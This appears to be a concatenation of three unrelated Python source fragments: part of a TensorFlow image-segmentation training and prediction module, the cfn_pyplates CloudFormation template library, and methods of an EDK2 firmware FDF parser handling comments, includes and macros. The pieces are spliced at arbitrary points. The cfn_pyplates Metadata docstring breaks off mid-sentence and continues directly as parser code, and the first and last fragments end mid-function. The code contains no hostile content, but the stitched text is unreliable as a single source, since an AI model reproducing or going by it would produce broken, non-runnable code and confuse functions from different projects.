        img_cp[i, :, :, :] = tile_img
        mask_np[i, :, :, :] = tile_mask

    # normalize
    if config.NORMALIZE:
        img_cp = img_cp / config.normalization_factor

    # standardize
    if config.STANDARDIZE:
        img_cp = batch_normalize(img_cp, axis=(0, 1), c=1e-8)

    # save dataset into local disk, npz format with x and y labels
    cp.savez(f'{save_dir}/{fimg[:-4]}.npz', x=img_cp, y=cp.asarray(mask_np))


# --------------------------------------------------------------------------
# Training Functions
# --------------------------------------------------------------------------

def get_tensorslices(data_dir='', img_id='x', label_id='y'):
    """
    Get image/label arrays from all .npz files on disk.

    Args:
        data_dir (str): directory where data resides
        img_id (str): object id from npz file to get data from
        label_id (str): object id from npz file to get labels from
    Return:
        (images, labels) numpy arrays, vstacked across all files
    ----------
    Example
    ----------
        get_tensorslices(data_dir='images', img_id='x', label_id='y')
    """
    # open files and generate training dataset
    images = np.array([])
    labels = np.array([])

    # read all data files from disk
    for f in glob.glob(f'{data_dir}/*'):
        with np.load(f) as data:
            # vstack image batches into memory
            if images.size:  # if images has elements, vstack new batch
                images = np.vstack([images, data[img_id]])
            else:  # if images empty, images equals new batch
                images = data[img_id]
            # vstack label batches into memory
            if labels.size:  # if labels has elements, vstack new batch
                labels = np.vstack([labels, data[label_id]])
            else:  # if labels empty, images equals new batch
                labels = data[label_id]
    return images, labels


def data_augment(image, label):
    """
    Augment data for semantic segmentation.

    Args:
        image (numpy.array): image numpy array
        label (numpy.array): label numpy array
    Return:
        augmented (image, label) pair
    ----------
    Example
    ----------
        data_augment(image, label)
    """
    # Thanks to the dataset.prefetch(AUTO) statement in the next function
    # (below), this happens essentially for free on TPU. Data pipeline code
    # is executed on the CPU part of the TPU, TPU is computing gradients.
    # NOTE(review): np.random is evaluated once at graph-trace time when this
    # is used inside dataset.map — confirm the intended per-element randomness.
    randint = np.random.randint(1, 7)
    if randint == 1:  # flip left and right
        image = tf.image.random_flip_left_right(image)
        label = tf.image.random_flip_left_right(label)
    elif randint == 2:  # reverse second dimension
        image = tf.image.random_flip_up_down(image)
        label = tf.image.random_flip_up_down(label)
    elif randint == 3:  # rotate 90 degrees
        image = tf.image.rot90(image, k=1)
        label = tf.image.rot90(label, k=1)
    elif randint == 4:  # rotate 180 degrees
        image = tf.image.rot90(image, k=2)
        label = tf.image.rot90(label, k=2)
    elif randint == 5:  # rotate 270 degrees
        image = tf.image.rot90(image, k=3)
        label = tf.image.rot90(label, k=3)
    return image, label


def get_training_dataset(dataset, config, do_aug=False, drop_remainder=False):
    """
    Return training dataset to feed tf.fit.

    Args:
        dataset (tf.dataset): tensorflow dataset
        config (Config): Config object with parameters
        do_aug (bool): perform augmentation on the fly?
            NOTE(review): currently unused — data_augment is always mapped.
        drop_remainder (bool): drop remainder when size does not match batch
    Return:
        tf dataset for training (shuffled, batched, repeated, prefetched)
    ----------
    Example
    ----------
        get_training_dataset(dataset, config)
    """
    dataset = dataset.map(data_augment, num_parallel_calls=config.AUTOTUNE)
    dataset = dataset.repeat()
    dataset = dataset.shuffle(2048)
    dataset = dataset.batch(config.BATCH_SIZE, drop_remainder=drop_remainder)
    # prefetch next batch while training (autotune prefetch buffer size)
    dataset = dataset.prefetch(config.AUTOTUNE)
    return dataset


def gen_callbacks(config, metadata):
    """
    Generate tensorflow callbacks.

    Args:
        config (Config): object with configurations (CALLBACKS names,
            MODEL_SAVEDIR, MODEL_OUTPUT_NAME)
        metadata (dict): dictionary with callback metadata values
    Return:
        list of callback functions
    ----------
    Example
    ----------
        gen_callbacks(config, metadata)
    """
    callback_list = list()

    if 'TensorBoard' in config.CALLBACKS:  # Generating tensorboard callbacks
        tensor = TensorBoard(
            log_dir=config.MODEL_SAVEDIR, write_graph=True,
            histogram_freq=metadata['history_freq']
        )
        callback_list.append(tensor)

    if 'CSVLogger' in config.CALLBACKS:  # initialize model csv logger callback
        # timestamped CSV file name next to the model output name
        csv_outfile = config.MODEL_OUTPUT_NAME[:-3] + '_' + \
            datetime.now().strftime("%Y%m%d-%H%M%S")+'.csv'
        csvlog = CSVLogger(csv_outfile, append=True, separator=';')
        callback_list.append(csvlog)

    if 'EarlyStopping' in config.CALLBACKS:  # initialize model early stopping callback
        early_stop = EarlyStopping(
            patience=metadata['patience_earlystop'],
            monitor=metadata['monitor_earlystop']
        )
        callback_list.append(early_stop)

    if 'ModelCheckpoint' in config.CALLBACKS:  # initialize model checkpoint callback
        checkpoint = ModelCheckpoint(
            filepath=config.MODEL_OUTPUT_NAME[:-3]+'_{epoch:02d}.h5',
            monitor=metadata['monitor_checkpoint'],
            save_best_only=metadata['save_best_only'],
            save_freq=metadata['save_freq'],
            verbose=1
        )
        callback_list.append(checkpoint)

    return callback_list


# --------------------------------------------------------------------------
# Prediction Functions
# --------------------------------------------------------------------------

def pad_image(img, target_size):
    """
    Pad an image up to the target size.

    Args:
        img (numpy.array): image array, shape (h, w, c)
        target_size (int): image target size
    Return:
        padded image array
        NOTE(review): assumes img is no larger than target_size in both
        spatial dims — negative padding would raise; confirm at call sites.
    ----------
    Example
    ----------
        pad_image(img, target_size=256)
    """
    rows_missing = target_size - img.shape[0]
    cols_missing = target_size - img.shape[1]
    padded_img = np.pad(
        img, ((0, rows_missing), (0, cols_missing), (0, 0)), 'constant'
    )
    return padded_img


def predict_windowing(x, model, config, spline):
    """
    Predict scene using windowing mechanisms.

    Args:
        x (numpy.array): image array, shape (h, w, c)
        model (tf h5): loaded model used for inference
        config (Config): provides TILE_SIZE
        spline (numpy.array): blending weights for overlapping windows
    Return:
        prediction scene array probabilities
    ----------
    Example
    ----------
        predict_windowing(x, model, config, spline)
    """
    print("Entering windowing prediction", x.shape)

    img_height = x.shape[0]
    img_width = x.shape[1]
    n_channels = x.shape[2]

    # make extended img so that it contains integer number of patches
    npatches_vertical = math.ceil(img_height / config.TILE_SIZE)
    npatches_horizontal = math.ceil(img_width / config.TILE_SIZE)
    extended_height = config.TILE_SIZE * npatches_vertical
    extended_width = config.TILE_SIZE * npatches_horizontal
    ext_x = np.zeros(
        shape=(extended_height, extended_width, n_channels), dtype=np.float32
    )

    # fill extended image with mirrors:
    ext_x[:img_height, :img_width, :] = x
    for i in range(img_height, extended_height):
        ext_x[i, :, :] = ext_x[2 * img_height - i - 1, :, :]
    for j in range(img_width, extended_width):
        ext_x[:, j, :] = ext_x[:, 2 * img_width - j - 1, :]

    # now we assemble all patches in one array
    patches_list = []  # do vstack later instead of list
    for i in range(0, npatches_vertical):
        for j in range(0, npatches_horizontal):
            x0, x1 = i * config.TILE_SIZE, (i + 1) * config.TILE_SIZE
            y0, y1 = j * config.TILE_SIZE, (j + 1) * config.TILE_SIZE
            patches_list.append(ext_x[x0:x1, y0:y1, :])
    patches_array = np.asarray(patches_list)
    # standardize
<filename>cfn_pyplates/core.py
# Copyright (c) 2013 MetaMetrics, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.

'''Core functionality and all required components of a working CFN template.

These are all available without preamble in a pyplate's global namespace.
'''

import inspect
import json

from ordereddict import OrderedDict

from cfn_pyplates.exceptions import AddRemoveError

# CloudFormation's only published template format version to date.
aws_template_format_version = '2010-09-09'

__all__ = [
    'JSONableDict',
    'CloudFormationTemplate',
    'Parameters',
    'Mappings',
    'Resources',
    'Outputs',
    'Properties',
    'Mapping',
    'Resource',
    'Parameter',
    'Output',
    'DependsOn',
    'DeletionPolicy',
    'UpdatePolicy',
    'Metadata',
    'ec2_tags',
]


class JSONableDict(OrderedDict):
    '''A dictionary that knows how to turn itself into JSON

    Args:
        update_dict: A dictionary of values for prepopulating the JSONableDict
            at instantiation
        name: An optional name. If left out, the class's (or subclass's) name
            will be used.

    The most common use-case of any JSON entry in a CFN Template is the
    ``{"Name": {"Key1": "Value1", "Key2": Value2"} }`` pattern. The
    significance of a JSONableDict's subclass name, or explicitly passing a
    'name' argument is accomodating this pattern. All JSONableDicts have
    names.

    To create the pyplate equivalent of the above JSON, contruct a
    JSONableDict accordingly::

        JSONableDict({'Key1': 'Value1', 'Key2', 'Value2'}, 'Name'})

    Based on :class:`ordereddict.OrderedDict`, the order of keys is
    significant.
    '''
    def __init__(self, update_dict=None, name=None):
        super(JSONableDict, self).__init__()
        self._name = name

        if update_dict:
            self.update(update_dict)

    def __unicode__(self):
        # Indenting to keep things readable
        # Trailing whitespace after commas removed
        # (The space after colons is cool, though. He can stay.)
        return unicode(self.json)

    def __str__(self):
        # Python 2 str() path: encode the unicode JSON representation.
        return unicode(self).encode('utf-8')

    def __setattr__(self, name, value):
        # This makes it simple to bind child dictionaries to an
        # attribute while still making sure they wind up in the output
        # dictionary, see usage example in CloudFormationTemplate init
        if isinstance(value, JSONableDict):
            self.add(value)
        super(JSONableDict, self).__setattr__(name, value)

    def __delattr__(self, name):
        # Mirror of __setattr__: unbinding a JSONableDict attribute also
        # removes it from the output dictionary.
        attr = getattr(self, name)
        if isinstance(attr, JSONableDict):
            try:
                self.remove(attr)
            except KeyError:
                # Key already deleted, somehow.
                # Everything's fine here now. How're you?
                pass
        super(JSONableDict, self).__delattr__(name)

    def _get_name(self):
        if self._name is not None:
            return self._name
        else:
            # Default to the class name if _name is None
            return self.__class__.__name__

    def _set_name(self, name):
        self._name = name

    def _del_name(self):
        self._name = None

    name = property(_get_name, _set_name, _del_name)
    '''Accessor to the ``name`` internals;

    Allows getting, settings, and deleting the name
    '''

    @property
    def json(self):
        'Accessor to the canonical JSON representation of a JSONableDict'
        return self.to_json(indent=2, separators=(',', ': '))

    def add(self, child):
        '''Add a child node

        Args:
            child: An instance of JSONableDict

        Raises:
            AddRemoveError: :exc:`cfn_pyplates.exceptions.AddRemoveError`
        '''
        if isinstance(child, JSONableDict):
            self.update(
                {child.name: child}
            )
        else:
            raise AddRemoveError
        return child

    def remove(self, child):
        '''Remove a child node

        Args:
            child: An instance of JSONableDict

        Raises:
            AddRemoveError: :exc:`cfn_pyplates.exceptions.AddRemoveError`
        '''
        if isinstance(child, JSONableDict):
            del(self[child.name])
        else:
            raise AddRemoveError

    def to_json(self, *args, **kwargs):
        '''Thin wrapper around the :func:`json.dumps` method.

        Allows for passing any arguments that json.dumps would accept to
        completely customize the JSON output if desired.
        '''
        return json.dumps(self, *args, **kwargs)


class CloudFormationTemplate(JSONableDict):
    '''The root element of a CloudFormation template [#cfn-template]_

    Takes an option description string in the constructor
    Comes pre-loaded with all the subelements CloudFormation can stand:

    - Parameters
    - Mappings
    - Resources
    - Outputs

    '''
    def __init__(self, description=None):
        super(CloudFormationTemplate, self).__init__({
            'AWSTemplateFormatVersion': aws_template_format_version,
        })
        if description:
            self.update({
                'Description': description,
            })
        # Tack on all the base template elements that a CF template can handle
        # at easy-to-reach parameters
        self.parameters = Parameters()
        self.mappings = Mappings()
        self.resources = Resources()
        self.outputs = Outputs()

    def __unicode__(self):
        # Before outputting to json, remove empty elements
        def predicate(obj):
            '''getmembers predicate to find empty JSONableDict attributes
            attached to self

            CloudFormation doesn't like empty mappings for these top-level
            attributes, so any falsey JSONableDict that's at attribute on the
            CloudFormationTemplate instance needs to get removed
            '''
            if isinstance(obj, JSONableDict) and not obj:
                return True
        for attr, mapping in inspect.getmembers(self, predicate):
            delattr(self, attr)

        return super(CloudFormationTemplate, self).__unicode__()


class Metadatums(JSONableDict):
    '''The base Container for metadatums used at stack creation
    [#cfn-metadata]_

    Attached to a :class:`cfn_pyplates.core.CloudFormationTemplate`

    NOTE(review): this class is not listed in ``__all__`` and is never
    attached by CloudFormationTemplate.__init__ above — confirm whether it
    is dead code or used elsewhere.
    '''
    pass


# CloudFormationTemplate base elements
class Parameters(JSONableDict):
    '''The base Container for parameters used at stack creation
    [#cfn-parameters]_

    Attached to a :class:`cfn_pyplates.core.CloudFormationTemplate`

    '''
    pass


class Mappings(JSONableDict):
    '''The base Container for stack option mappings [#cfn-mappings]_

    .. note::
        Since most lookups can be done inside a pyplate using python,
        this is normally unused.

    Attached to a :class:`cfn_pyplates.core.CloudFormationTemplate`

    '''
    pass


class Resources(JSONableDict):
    '''The base Container for stack resources [#cfn-resources]_

    Attached to a :class:`cfn_pyplates.core.CloudFormationTemplate`

    '''
    pass


class Outputs(JSONableDict):
    '''The base Container for stack outputs [#cfn-outputs]_

    Attached to a :class:`cfn_pyplates.core.CloudFormationTemplate`

    '''
    pass


# Other 'named' JSONableDicts
class Properties(JSONableDict):
    '''A properties mapping [#cfn-properties]_, used by various CFN
    declarations

    Can be found in:

    - :class:`cfn_pyplates.core.Parameters`
    - :class:`cfn_pyplates.core.Outputs`
    - :class:`cfn_pyplates.core.Resource`

    Properties will be most commonly found in Resources

    '''
    pass


class Resource(JSONableDict):
    '''A generic CFN Resource [#cfn-resource-types]_

    Used in the :class:`cfn_pyplates.core.Resources` container.

    All resources have a name, and most have a 'Type' and 'Properties' dict.
    Thus, this class takes those as arguments and makes a generic resource.

    The 'name' parameter must follow CFN's guidelines for naming
    [#cfn-resources]_
    The 'type' parameter must be one of these:
    http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-template-resource-type-ref.html
    The optional 'properties' parameter is a dictionary of properties as
    defined by the resource type, see documentation related to each resource
    type

    Args:
        name: The unique name of the resource to add
        type: The type of this resource
        properties: Optional properties mapping to apply to this resource,
            can be an instance of ``JSONableDict`` or just plain old ``dict``
        attributes: Optional (one of 'DependsOn', 'DeletionPolicy',
            'Metadata', 'UpdatePolicy' or a list of 2 or more)

    NOTE(review): ``attributes=[]`` is a mutable default argument; it is not
    mutated here but is an anti-pattern worth cleaning up.
    '''

    def __init__(self, name, type, properties=None, attributes=[]):
        update_dict = {'Type': type}
        super(Resource, self).__init__(update_dict, name)

        if properties:
            try:
                # Assume we've got a JSONableDict
                self.add(properties)
            except AddRemoveError:
                # If not, coerce it
                self.add(Properties(properties))

        if attributes:
            # NOTE(review): __is_attribute has no return statement, so it
            # always yields None (falsey); attachment happens via its side
            # effects and the 'self.add(attributes)' branch below appears
            # unreachable — confirm intended behavior before refactoring.
            if self.__is_attribute(attributes):
                self.add(attributes)
            elif isinstance(attributes, list):
                for i in attributes:
                    if isinstance(i, JSONableDict) and self.__is_attribute(i):
                        self.add(i)

    def __is_attribute(self, attribute):
        """Is the Object a valid Resource Attribute?

        :param attribute: the object under test

        NOTE(review): despite the name, this method attaches the attribute
        as a side effect and returns None in every branch.
        """
        if isinstance(attribute, list):
            for i in attribute:
                self.__is_attribute(i)
        elif attribute.__class__.__name__ in ['Metadata', 'UpdatePolicy']:
            self.add(attribute)
        elif attribute.__class__.__name__ in ['DependsOn', 'DeletionPolicy']:
            self.update({attribute.__class__.__name__: attribute.value})


class Parameter(JSONableDict):
    '''A CFN Parameter [#cfn-parameters]_

    Used in the :class:`cfn_pyplates.core.Parameters` container, a Parameter
    will be used when the template is processed by CloudFormation to prompt
    the user for any additional input.

    More information for Parameter options:
    http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/parameters-section-structure.html

    Args:
        name: The unique name of the parameter to add
        type: The type of this parameter
        properties: Optional properties mapping to apply to this parameter

    '''
    def __init__(self, name, type, properties=None):
        # Just like a Resource, except the properties go in the
        # update_dict, not a named key.
        update_dict = {'Type': type}
        if properties is not None:
            update_dict.update(properties)
        super(Parameter, self).__init__(update_dict, name)


class Mapping(JSONableDict):
    '''A CFN Mapping [#cfn-mappings]_

    Used in the :class:`cfn_pyplates.core.Mappings` container, a Mapping
    defines mappings used within the Cloudformation template and is not the
    same as a PyPlates options mapping.

    More information for mapping options:
    http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/concept-mappings.html

    Args:
        name: The unique name of the mapping to add
        mappings: The dictionary of mappings

    '''
    def __init__(self, name, mappings=None):
        update_dict = {}
        if mappings is not None:
            update_dict.update(mappings)
        super(Mapping, self).__init__(update_dict, name)


class Output(JSONableDict):
    '''A CFN Output [#cfn-outputs]_

    Used in the :class:`cfn_pyplates.core.Outputs`, an Output entry describes
    a value to be shown when describe this stack using CFN API tools.

    More information for Output options can be found here:
    http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/outputs-section-structure.html

    Args:
        name: The unique name of the output
        value: The value the output should return
        description: An optional description of this output

    '''
    def __init__(self, name, value, description=None):
        update_dict = {'Value': value}
        if description is not None:
            update_dict['Description'] = description
        super(Output, self).__init__(update_dict, name)


class Metadata(JSONableDict):
    '''A CFN Output [#cfn-outputs]_

    Used in the :class:`cfn_pyplates.core.Resource`, The Metadata attribute
    enables you to associate structured data with a resource. By adding a
    Metadata attribute to a resource, you can
    # Get the one char pass the char pointed to by the file buffer pointer
    #
    #   @param  self        The object pointer
    #   @retval Char        Next char
    #
    def _NextChar(self):
        # At the last char of the current line, the "next" char is the first
        # char of the following line.
        if self.CurrentOffsetWithinLine == len(self.Profile.FileLinesList[self.CurrentLineNumber - 1]) - 1:
            return self.Profile.FileLinesList[self.CurrentLineNumber][0]
        return self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine + 1]

    ## _SetCurrentCharValue() method
    #
    #   Modify the value of current char
    #
    #   @param  self        The object pointer
    #   @param  Value       The new value of current char
    #
    def _SetCurrentCharValue(self, Value):
        self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine] = Value

    ## _CurrentLine() method
    #
    #   Get the list that contains current line contents
    #
    #   @param  self        The object pointer
    #   @retval List        current line contents
    #
    def _CurrentLine(self):
        return self.Profile.FileLinesList[self.CurrentLineNumber - 1]

    ## _StringToList() method
    #
    #   Explode each line string into a list of chars so single chars can be
    #   overwritten in place (see _SetCurrentCharValue / _ReplaceFragment).
    #
    def _StringToList(self):
        self.Profile.FileLinesList = [list(s) for s in self.Profile.FileLinesList]
        if not self.Profile.FileLinesList:
            EdkLogger.error('FdfParser', FILE_READ_FAILURE, 'The file is empty!', File=self.FileName)

        # Sentinel space at the very end of the buffer.
        self.Profile.FileLinesList[-1].append(' ')

    ## _ReplaceFragment() method
    #
    #   Blank out (replace with Value) the chars between StartPos and EndPos
    #   inclusive, spanning lines if needed; line-break chars are preserved.
    #
    #   @param  self        The object pointer
    #   @param  StartPos    (line index, offset) of the first char to replace
    #   @param  EndPos      (line index, offset) of the last char to replace
    #   @param  Value       Replacement char, default is a space
    #
    def _ReplaceFragment(self, StartPos, EndPos, Value = ' '):
        if StartPos[0] == EndPos[0]:
            # Single-line fragment.
            Offset = StartPos[1]
            while Offset <= EndPos[1]:
                self.Profile.FileLinesList[StartPos[0]][Offset] = Value
                Offset += 1
            return

        # Multi-line fragment: finish the first line up to its line break...
        Offset = StartPos[1]
        while self.Profile.FileLinesList[StartPos[0]][Offset] not in CR_LB_SET:
            self.Profile.FileLinesList[StartPos[0]][Offset] = Value
            Offset += 1

        # ...blank every full line in between...
        Line = StartPos[0]
        while Line < EndPos[0]:
            Offset = 0
            while self.Profile.FileLinesList[Line][Offset] not in CR_LB_SET:
                self.Profile.FileLinesList[Line][Offset] = Value
                Offset += 1
            Line += 1

        # ...then the head of the last line through EndPos.
        Offset = 0
        while Offset <= EndPos[1]:
            self.Profile.FileLinesList[EndPos[0]][Offset] = Value
            Offset += 1

    ## _SetMacroValue() method
    #
    #   Record a macro value scoped to the current section.
    #
    #   @param  self        The object pointer
    #   @param  Macro       Macro name
    #   @param  Value       Macro value
    #
    def _SetMacroValue(self, Macro, Value):
        if not self._CurSection:
            return

        MacroDict = {}
        if not self._MacroDict[self._CurSection[0], self._CurSection[1], self._CurSection[2]]:
            self._MacroDict[self._CurSection[0], self._CurSection[1], self._CurSection[2]] = MacroDict
        else:
            MacroDict = self._MacroDict[self._CurSection[0], self._CurSection[1], self._CurSection[2]]
        MacroDict[Macro] = Value

    ## _GetMacroValue() method
    #
    #   Look up a macro value by priority: command line, global defines,
    #   current-section macros, then platform defines.
    #
    #   @param  self        The object pointer
    #   @param  Macro       Macro name
    #   @retval Value       Macro value, or None if undefined
    #
    def _GetMacroValue(self, Macro):
        # Highest priority
        if Macro in GlobalData.gCommandLineDefines:
            return GlobalData.gCommandLineDefines[Macro]
        if Macro in GlobalData.gGlobalDefines:
            return GlobalData.gGlobalDefines[Macro]

        if self._CurSection:
            MacroDict = self._MacroDict[
                        self._CurSection[0],
                        self._CurSection[1],
                        self._CurSection[2]
            ]
            if MacroDict and Macro in MacroDict:
                return MacroDict[Macro]

        # Lowest priority
        if Macro in GlobalData.gPlatformDefines:
            return GlobalData.gPlatformDefines[Macro]
        return None

    ## _SectionHeaderParser() method
    #
    #   Parse a section header and set self._CurSection to a normalized
    #   [type, UiName/arch, arch] triple used as the macro-scope key.
    #
    #   @param  self        The object pointer
    #   @param  Section     The raw '[...]' header text
    #
    def _SectionHeaderParser(self, Section):
        # [Defines]
        # [FD.UiName]: use dummy instead if UI name is optional
        # [FV.UiName]
        # [Capsule.UiName]
        # [Rule]: don't take rule section into account, macro is not allowed in this section
        # [VTF.arch.UiName, arch]
        # [OptionRom.DriverName]
        self._CurSection = []
        Section = Section.strip()[1:-1].upper().replace(' ', '').strip(TAB_SPLIT)
        ItemList = Section.split(TAB_SPLIT)
        Item = ItemList[0]
        if Item == '' or Item == 'RULE':
            return

        if Item == TAB_COMMON_DEFINES.upper():
            self._CurSection = [TAB_COMMON, TAB_COMMON, TAB_COMMON]
        elif Item == 'VTF' and len(ItemList) == 3:
            UiName = ItemList[2]
            Pos = UiName.find(TAB_COMMA_SPLIT)
            if Pos != -1:
                UiName = UiName[:Pos]
            self._CurSection = ['VTF', UiName, ItemList[1]]
        elif len(ItemList) > 1:
            self._CurSection = [ItemList[0], ItemList[1], TAB_COMMON]
        elif len(ItemList) > 0:
            self._CurSection = [ItemList[0], 'DUMMY', TAB_COMMON]

    ## PreprocessFile() method
    #
    #   Preprocess file contents, replace comments with spaces.
    #   In the end, rewind the file buffer pointer to the beginning
    #   BUGBUG: No !include statement processing contained in this procedure
    #   !include statement should be expanded at the same FileLinesList[CurrentLineNumber - 1]
    #
    #   @param  self        The object pointer
    #
    def PreprocessFile(self):
        self.Rewind()
        InComment = False
        DoubleSlashComment = False
        HashComment = False
        # HashComment in quoted string " " is ignored.
        InString = False

        while not self._EndOfFile():

            if self._CurrentChar() == T_CHAR_DOUBLE_QUOTE and not InComment:
                InString = not InString
            # meet new line, then no longer in a comment for // and '#'
            if self._CurrentChar() == TAB_LINE_BREAK:
                self.CurrentLineNumber += 1
                self.CurrentOffsetWithinLine = 0
                if InComment and DoubleSlashComment:
                    InComment = False
                    DoubleSlashComment = False
                if InComment and HashComment:
                    InComment = False
                    HashComment = False
            # check for */ comment end
            elif InComment and not DoubleSlashComment and not HashComment and self._CurrentChar() == TAB_STAR and self._NextChar() == TAB_BACK_SLASH:
                self._SetCurrentCharValue(TAB_SPACE_SPLIT)
                self._GetOneChar()
                self._SetCurrentCharValue(TAB_SPACE_SPLIT)
                self._GetOneChar()
                InComment = False
            # set comments to spaces
            elif InComment:
                self._SetCurrentCharValue(TAB_SPACE_SPLIT)
                self._GetOneChar()
            # check for // comment
            elif self._CurrentChar() == TAB_BACK_SLASH and self._NextChar() == TAB_BACK_SLASH and not self._EndOfLine():
                InComment = True
                DoubleSlashComment = True
            # check for '#' comment
            elif self._CurrentChar() == TAB_COMMENT_SPLIT and not self._EndOfLine() and not InString:
                InComment = True
                HashComment = True
            # check for /* comment start
            elif self._CurrentChar() == TAB_BACK_SLASH and self._NextChar() == TAB_STAR:
                self._SetCurrentCharValue(TAB_SPACE_SPLIT)
                self._GetOneChar()
                self._SetCurrentCharValue(TAB_SPACE_SPLIT)
                self._GetOneChar()
                InComment = True
            else:
                self._GetOneChar()

        # restore from ListOfList to ListOfString
        self.Profile.FileLinesList = ["".join(list) for list in self.Profile.FileLinesList]
        self.Rewind()

    ## PreprocessIncludeFile() method
    #
    #   Preprocess file contents, replace !include statements with file contents.
    #   In the end, rewind the file buffer pointer to the beginning
    #
    #   @param  self        The object pointer
    #
    def PreprocessIncludeFile(self):
        # nested include support
        Processed = False
        MacroDict = {}
        while self._GetNextToken():

            if self._Token == TAB_DEFINE:
                if not self._GetNextToken():
                    raise Warning.Expected("Macro name", self.FileName, self.CurrentLineNumber)
                Macro = self._Token
                if not self._IsToken(TAB_EQUAL_SPLIT):
                    raise Warning.ExpectedEquals(self.FileName, self.CurrentLineNumber)
                Value = self._GetExpression()
                MacroDict[Macro] = Value

            elif self._Token == TAB_INCLUDE:
                Processed = True
                IncludeLine = self.CurrentLineNumber
                IncludeOffset = self.CurrentOffsetWithinLine - len(TAB_INCLUDE)
                if not self._GetNextToken():
                    raise Warning.Expected("include file name", self.FileName, self.CurrentLineNumber)
                IncFileName = self._Token
                # Expand every $(MACRO) reference in the include file name.
                PreIndex = 0
                StartPos = IncFileName.find('$(', PreIndex)
                EndPos = IncFileName.find(')', StartPos+2)
                while StartPos != -1 and EndPos != -1:
                    Macro = IncFileName[StartPos+2: EndPos]
                    MacroVal = self._GetMacroValue(Macro)
                    if not MacroVal:
                        if Macro in MacroDict:
                            MacroVal = MacroDict[Macro]
                    if MacroVal is not None:
                        IncFileName = IncFileName.replace('$(' + Macro + ')', MacroVal, 1)
                        if MacroVal.find('$(') != -1:
                            # Expanded value may itself contain macros.
                            PreIndex = StartPos
                        else:
                            PreIndex = StartPos + len(MacroVal)
                    else:
                        raise Warning("The Macro %s is not defined" %Macro, self.FileName, self.CurrentLineNumber)
                    StartPos = IncFileName.find('$(', PreIndex)
                    EndPos = IncFileName.find(')', StartPos+2)

                IncludedFile = NormPath(IncFileName)
                #
                # First search the include file under the same directory as FDF file
                #
                IncludedFile1 = PathClass(IncludedFile, os.path.dirname(self.FileName))
                ErrorCode = IncludedFile1.Validate()[0]
                if ErrorCode != 0:
                    #
                    # Then search the include file under the same directory as DSC file
                    #
                    PlatformDir = ''
                    if GenFdsGlobalVariable.ActivePlatform:
                        PlatformDir = GenFdsGlobalVariable.ActivePlatform.Dir
                    elif GlobalData.gActivePlatform:
                        PlatformDir = GlobalData.gActivePlatform.MetaFile.Dir
                    IncludedFile1 = PathClass(IncludedFile, PlatformDir)
                    ErrorCode = IncludedFile1.Validate()[0]
                    if ErrorCode != 0:
                        #
                        # Also search file under the WORKSPACE directory
                        #
                        IncludedFile1 = PathClass(IncludedFile, GlobalData.gWorkspace)
                        ErrorCode = IncludedFile1.Validate()[0]
                        if ErrorCode != 0:
                            raise Warning("The include file does not exist under below directories: \n%s\n%s\n%s\n"%(os.path.dirname(self.FileName), PlatformDir, GlobalData.gWorkspace),
                                          self.FileName, self.CurrentLineNumber)

                if not IsValidInclude (IncludedFile1.Path, self.CurrentLineNumber):
                    raise Warning("The include file {0} is causing a include loop.\n".format (IncludedFile1.Path), self.FileName, self.CurrentLineNumber)

                IncFileProfile = IncludeFileProfile(IncludedFile1.Path)
                CurrentLine = self.CurrentLineNumber
                CurrentOffset = self.CurrentOffsetWithinLine
                # list index of the insertion, note that line number is 'CurrentLine + 1'
                InsertAtLine = CurrentLine
                ParentProfile = GetParentAtLine (CurrentLine)
                if ParentProfile is not None:
                    ParentProfile.IncludeFileList.insert(0, IncFileProfile)
                    IncFileProfile.Level = ParentProfile.Level + 1
                IncFileProfile.InsertStartLineNumber = InsertAtLine + 1
                # deal with remaining portions after "!include filename", if exists.
                if self._GetNextToken():
                    if self.CurrentLineNumber == CurrentLine:
                        RemainingLine = self._CurrentLine()[CurrentOffset:]
                        self.Profile.FileLinesList.insert(self.CurrentLineNumber, RemainingLine)
                        IncFileProfile.InsertAdjust += 1
                        self.CurrentLineNumber += 1
                        self.CurrentOffsetWithinLine = 0

                # Splice the included file's lines into the current buffer.
                for Line in IncFileProfile.FileLinesList:
                    self.Profile.FileLinesList.insert(InsertAtLine, Line)
                    self.CurrentLineNumber += 1
                    InsertAtLine += 1

                # reversely sorted to better determine error in file
                AllIncludeFileList.insert(0, IncFileProfile)

                # comment out the processed include file statement
                TempList = list(self.Profile.FileLinesList[IncludeLine - 1])
                TempList.insert(IncludeOffset, TAB_COMMENT_SPLIT)
                self.Profile.FileLinesList[IncludeLine - 1] = ''.join(TempList)
            if Processed: # Nested and back-to-back support
                self.Rewind(DestLine = IncFileProfile.InsertStartLineNumber - 1)
                Processed = False
        # Preprocess done.
        self.Rewind()

    ## _GetIfListCurrentItemStat() method
    #
    #   True when every conditional branch on the stack is currently
    #   satisfied (or the stack is empty).
    #
    #   @param  IfList      Stack of [Pos, CondSatisfied, BranchDetermined]
    #
    @staticmethod
    def _GetIfListCurrentItemStat(IfList):
        if len(IfList) == 0:
            return True

        for Item in IfList:
            if Item[1] == False:
                return False

        return True

    ## PreprocessConditionalStatement() method
    #
    #   Preprocess conditional statement.
    #   In the end, rewind the file buffer pointer to the beginning
    #
    #   @param  self        The object pointer
    #
    def PreprocessConditionalStatement(self):
        # IfList is a stack of if branches with elements of list [Pos, CondSatisfied, BranchDetermined]
        IfList = []
        RegionLayoutLine = 0
        ReplacedLine = -1
        while self._GetNextToken():
            # Determine section name and the location dependent macro
            if self._GetIfListCurrentItemStat(IfList):
                if self._Token.startswith(TAB_SECTION_START):
                    Header = self._Token
                    if not self._Token.endswith(TAB_SECTION_END):
                        self._SkipToToken(TAB_SECTION_END)
                        Header += self._SkippedChars
                    if Header.find('$(') != -1:
                        raise Warning("macro cannot be used in section header", self.FileName, self.CurrentLineNumber)
                    self._SectionHeaderParser(Header)
                    continue
                # Replace macros except in RULE section or out of section
                elif self._CurSection and ReplacedLine != self.CurrentLineNumber:
                    ReplacedLine = self.CurrentLineNumber
